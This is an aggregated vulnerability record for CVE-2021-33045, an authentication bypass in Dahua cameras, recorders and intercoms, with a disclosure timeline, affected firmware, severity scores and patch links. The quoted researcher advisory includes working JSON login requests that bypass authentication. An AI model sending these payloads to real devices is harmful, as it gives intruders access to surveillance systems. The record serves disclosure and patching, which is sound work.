ID

VAR-202109-1874


CVE

CVE-2021-33045


TITLE

plural  Dahua  Product certification vulnerabilities

Trust: 0.8

sources: JVNDB: JVNDB-2021-012414

DESCRIPTION

The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. plural Dahua The product contains authentication vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Dahua IPC is a series of industrial computer from Dahua of China Dahua Company. Zhejiang Dahua Technology Co., Ltd. is a leading monitoring product supplier and solution service provider. [STX] Subject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045) Attack vector: Remote Authentication: Anonymous (no credentials needed) Researcher: bashis <mcw noemail eu> (2021) Limited Disclosure: September 6, 2021 Full Disclosure: October 6, 2021 PoC: https://github.com/mcw0/DahuaConsole -=[Dahua]=- Advisory: https://www.dahuasecurity.com/support/cybersecurity/details/957 Firmware: https://www.dahuasecurity.com/support/downloadCenter/firmware -=[Timeline]=- June 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com) June 17, 2021: Sent reminder to Dahua PSIRT June 18, 2021: Asked IPVM for help to get in contact with Dahua June 18, 2021: Received ACK from IPVM, told they sent note to Dahua June 19, 2021: ACK received from Dahua PSIRT, asked for additional details June 19, 2021: Additional details including PoC sent June 21, 2021: ACK received, vulnerabilites confirmed June 23, 2021: Dahua PSIRT asked for "coordinated disclosure" June 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now June 24, 2021: Received CVE-2021-33044, I asked about the second CVE July 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for "coordinated disclosure" July 04, 2021: Confirmed "coordinated disclosure", once again July 05, 2021: Dahua PSIRT tried convince me for "Full Disclosure" for vendor only, and "Limited Disclosure" for outside world July 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before "Limited Disclosure" September 6, 2021. "Full Disclosure" will be October 6, 2021, August 30, 2021: Dahua PSIRT asked to read my "Limited Disclosure" note August 30, 2021: Sent my "Limited Disclosure" note September 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates September 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices September 2, 2021: Dahua PSIRT pointed oversea website, asked for what models I have so Dahua could release firmware September 2, 2021: Refused to provide details, as I do expect me to find firmware on their website September 3, 2021: Dahua PSIRT informed that R&D will upload updated firmware in batches September 6, 2021: Limited Disclosure October 6, 2021: Full Disclosure -=[NetKeyboard Vulnerability]=- CVE-2021-33044 Vulnerability: "clientType": "NetKeyboard", Vulnerable device types: IPC/VTH/VTO (tested) Vulnerable Firmware: Those devices who do not support "NetKeyboard" functionality (older than June 2021) Protocol: DHIP and HTTP/HTTPS Details: Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence will simply bypass authentication. Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":<sessionID>} [Example] { "method": "global.login", "params": { "userName": "admin", "loginType": "Direct", "clientType": "NetKeyboard", "authorityType": "Default", "passwordType": "Default", "password": "Not Used" }, "id": 1, "session": 0 } -=[Loopback Vulnerability]=- CVE-2021-33045 Vulnerability: "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", Vulnerable device types: IPC/VTH/VTO/NVR/DVR (tested) Vulnerable Firmware: Firmware version older than beginning/mid 2020. Protocol: DHIP Details: Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence pretends that the login request comes from "loopback" and will therefore bypass legitimate authentication. Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":<sessionID>} [Example] Random MD5 with l/p: admin/admin { "method": "global.login", "params": { "userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "authorityType": "Default", "passwordType": "Default", "password": "[REDACTED]" }, "id": 1, "session": 0 } Plain text with l/p: admin/admin { "method": "global.login", "params": { "userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "authorityType": "Default", "passwordType": "Plain", "password": "admin" }, "id": 1, "session": 0 } [ETX]

Trust: 2.79

sources: NVD: CVE-2021-33045 // JVNDB: JVNDB-2021-012414 // CNVD: CNVD-2021-103420 // CNVD: CNVD-2021-70815 // PACKETSTORM: 164423

IOT TAXONOMY

category:['ICS']sub_category: -

Trust: 0.6

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2021-103420 // CNVD: CNVD-2021-70815

AFFECTED PRODUCTS

vendor:dahuasecuritymodel:xvr-5x08scope:ltversion:4.001.0000003.1.r.210710

Trust: 1.0

vendor:dahuasecuritymodel:xvr-5x04scope:ltversion:4.001.0000003.1.r.210710

Trust: 1.0

vendor:dahuasecuritymodel:vto-75x95xscope:ltversion:4.300.0000003.0.r.210714

Trust: 1.0

vendor:dahuasecuritymodel:nvr-1xxxscope:ltversion:4.001.0000005.1.r.210709

Trust: 1.0

vendor:dahuasecuritymodel:ipc-hum7xxxscope:ltversion:2.820.0000000.5.r.210705

Trust: 1.0

vendor:dahuasecuritymodel:vth-542xhscope:ltversion:4.500.0000002.0.r.210715

Trust: 1.0

vendor:dahuasecuritymodel:ipc-hx3xxxscope:ltversion:2.800.0000000.29.r.210630

Trust: 1.0

vendor:dahuasecuritymodel:xvr-4x04scope:eqversion: -

Trust: 1.0

vendor:dahuasecuritymodel:nvr-2xxxscope:ltversion:4.001.0000000.1.r.210710

Trust: 1.0

vendor:dahuasecuritymodel:xvr-7x32scope:ltversion:4.001.0000003.1.r.210710

Trust: 1.0

vendor:dahuasecuritymodel:ipc-hx5xxxscope:ltversion:2.820.0000000.5.r.210705

Trust: 1.0

vendor:dahuasecuritymodel:vto-65xxxscope:ltversion:4.300.0000004.0.r.210715

Trust: 1.0

vendor:dahuasecuritymodel:nvr-5xxxscope:ltversion:4.001.0000000.0.r.210710

Trust: 1.0

vendor:dahuasecuritymodel:nvr-4xxxscope:ltversion:4.001.0000005.1.r.210713

Trust: 1.0

vendor:dahuasecuritymodel:xvr-5x16scope:ltversion:4.001.0000003.1.r.210710

Trust: 1.0

vendor:dahuasecuritymodel:xvr-4x08scope:ltversion:4.001.0000001.1.r.210709

Trust: 1.0

vendor:dahuasecuritymodel:nvr-6xxscope:ltversion:4.001.0000001.1.r.210716

Trust: 1.0

vendor:dahuasecuritymodel:xvr-7x16scope:ltversion:4.001.0000003.1.r.210710

Trust: 1.0

vendor:dahuasecuritymodel:xvr-4x04scope:ltversion:4.001.0000001.1.r.210709

Trust: 1.0

vendor:dahuamodel:vth-542xhscope: - version: -

Trust: 0.8

vendor:dahuamodel:vto-65xxxscope: - version: -

Trust: 0.8

vendor:dahuamodel:nvr-4xxxscope: - version: -

Trust: 0.8

vendor:dahuamodel:nvr-6xxscope: - version: -

Trust: 0.8

vendor:dahuamodel:ipc-hx5xxxscope: - version: -

Trust: 0.8

vendor:dahuamodel:ipc-hx3xxxscope: - version: -

Trust: 0.8

vendor:dahuamodel:nvr-5xxxscope: - version: -

Trust: 0.8

vendor:dahuamodel:nvr-2xxxscope: - version: -

Trust: 0.8

vendor:dahuamodel:nvr-1xxxscope: - version: -

Trust: 0.8

vendor:dahuamodel:ipc-hum7xxxscope: - version: -

Trust: 0.8

vendor:dahuamodel:ipcscope: - version: -

Trust: 0.6

vendor:dahuamodel:ipc-hx3xxx versions which build time before mayscope:eqversion:2020

Trust: 0.6

vendor:dahuamodel:hx5xxx versions which build time before mayscope:eqversion:2020

Trust: 0.6

vendor:dahuamodel:hum7xxx versions which build time before mayscope:eqversion:2020

Trust: 0.6

vendor:dahuamodel:vto75x95x versions which build time before decemberscope:eqversion:2019

Trust: 0.6

vendor:dahuamodel:vto65xxx versions which build time before decemberscope:eqversion:2019

Trust: 0.6

vendor:dahuamodel:vth542xh versions which build time before decemberscope:eqversion:2019

Trust: 0.6

vendor:dahuamodel:nvr1xxx versions which build time before decemberscope:eqversion:2019

Trust: 0.6

vendor:dahuamodel:nvr2xxx versions which build time before decemberscope:eqversion:2019

Trust: 0.6

vendor:dahuamodel:nvr5xxx versions which build time before decemberscope:eqversion:2019

Trust: 0.6

vendor:dahuamodel:nvr6xx versions which build time before decemberscope:eqversion:2019

Trust: 0.6

vendor:dahuamodel:xvr4xxx versions which build time before decemberscope:eqversion:2019

Trust: 0.6

vendor:dahuamodel:xvr5xxx versions which build time before decemberscope:eqversion:2019

Trust: 0.6

vendor:dahuamodel:xvr7xxx versions which build time before decemberscope:eqversion:2019

Trust: 0.6

sources: CNVD: CNVD-2021-103420 // CNVD: CNVD-2021-70815 // JVNDB: JVNDB-2021-012414 // NVD: CVE-2021-33045

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2021-33045
value: CRITICAL

Trust: 1.0

NVD: CVE-2021-33045
value: CRITICAL

Trust: 0.8

CNVD: CNVD-2021-103420
value: HIGH

Trust: 0.6

CNVD: CNVD-2021-70815
value: HIGH

Trust: 0.6

CNNVD: CNNVD-202109-1081
value: CRITICAL

Trust: 0.6

nvd@nist.gov: CVE-2021-33045
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2021-103420
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

CNVD: CNVD-2021-70815
severity: HIGH
baseScore: 7.6
vectorString: AV:N/AC:H/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: HIGH
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 4.9
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

nvd@nist.gov: CVE-2021-33045
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 3.9
impactScore: 5.9
version: 3.1

Trust: 1.0

NVD: CVE-2021-33045
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: CNVD: CNVD-2021-103420 // CNVD: CNVD-2021-70815 // JVNDB: JVNDB-2021-012414 // CNNVD: CNNVD-202109-1081 // NVD: CVE-2021-33045

PROBLEMTYPE DATA

problemtype:CWE-287

Trust: 1.0

problemtype:Inappropriate authentication (CWE-287) [NVD evaluation ]

Trust: 0.8

sources: JVNDB: JVNDB-2021-012414 // NVD: CVE-2021-33045

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-202109-1081

TYPE

authorization issue

Trust: 0.6

sources: CNNVD: CNNVD-202109-1081

PATCH

title:DHCC-SA-202106-001url:https://www.dahuasecurity.com/support/cybersecurity/details/957

Trust: 0.8

title:Patch for Dahua IPC Authentication Bypass Vulnerability (CNVD-2021-103420)url:https://www.cnvd.org.cn/patchInfo/show/311541

Trust: 0.6

title:Patch for Identity authentication bypass vulnerability in some Dahua products (CNVD-2021-70815)url:https://www.cnvd.org.cn/patchInfo/show/290746

Trust: 0.6

title:Dahua IPC Remediation measures for authorization problem vulnerabilitiesurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=164676

Trust: 0.6

title:PoCurl:https://github.com/mcw0/PoC

Trust: 0.1

sources: CNVD: CNVD-2021-103420 // CNVD: CNVD-2021-70815 // VULMON: CVE-2021-33045 // JVNDB: JVNDB-2021-012414 // CNNVD: CNNVD-202109-1081

EXTERNAL IDS

db:NVDid:CVE-2021-33045

Trust: 4.6

db:PACKETSTORMid:164423

Trust: 2.3

db:JVNDBid:JVNDB-2021-012414

Trust: 0.8

db:CNVDid:CNVD-2021-103420

Trust: 0.6

db:CNVDid:CNVD-2021-70815

Trust: 0.6

db:CNNVDid:CNNVD-202109-1081

Trust: 0.6

db:VULMONid:CVE-2021-33045

Trust: 0.1

sources: CNVD: CNVD-2021-103420 // CNVD: CNVD-2021-70815 // VULMON: CVE-2021-33045 // JVNDB: JVNDB-2021-012414 // PACKETSTORM: 164423 // CNNVD: CNNVD-202109-1081 // NVD: CVE-2021-33045

REFERENCES

url:http://packetstormsecurity.com/files/164423/dahua-authentication-bypass.html

Trust: 2.8

url:http://seclists.org/fulldisclosure/2021/oct/13

Trust: 2.4

url:https://www.dahuasecurity.com/support/cybersecurity/details/957

Trust: 2.3

url:https://nvd.nist.gov/vuln/detail/cve-2021-33045

Trust: 1.5

url:https://github.com/mcw0/poc

Trust: 0.1

url:https://github.com/mcw0/dahuaconsole

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-33044

Trust: 0.1

url:https://www.dahuasecurity.com/support/downloadcenter/firmware

Trust: 0.1

sources: CNVD: CNVD-2021-103420 // CNVD: CNVD-2021-70815 // VULMON: CVE-2021-33045 // JVNDB: JVNDB-2021-012414 // PACKETSTORM: 164423 // CNNVD: CNNVD-202109-1081 // NVD: CVE-2021-33045

CREDITS

bashis

Trust: 0.1

sources: PACKETSTORM: 164423

SOURCES

db:CNVDid:CNVD-2021-103420
db:CNVDid:CNVD-2021-70815
db:VULMONid:CVE-2021-33045
db:JVNDBid:JVNDB-2021-012414
db:PACKETSTORMid:164423
db:CNNVDid:CNNVD-202109-1081
db:NVDid:CVE-2021-33045

LAST UPDATE DATE

2024-08-22T23:09:33.598000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2021-103420date:2022-01-18T00:00:00
db:CNVDid:CNVD-2021-70815date:2021-09-14T00:00:00
db:JVNDBid:JVNDB-2021-012414date:2022-08-31T02:43:00
db:CNNVDid:CNNVD-202109-1081date:2021-10-08T00:00:00
db:NVDid:CVE-2021-33045date:2024-08-22T01:00:01.277

SOURCES RELEASE DATE

db:CNVDid:CNVD-2021-103420date:2021-12-30T00:00:00
db:CNVDid:CNVD-2021-70815date:2021-09-14T00:00:00
db:JVNDBid:JVNDB-2021-012414date:2022-08-31T00:00:00
db:PACKETSTORMid:164423date:2021-10-06T15:11:51
db:CNNVDid:CNNVD-202109-1081date:2021-09-15T00:00:00
db:NVDid:CVE-2021-33045date:2021-09-15T22:15:10.687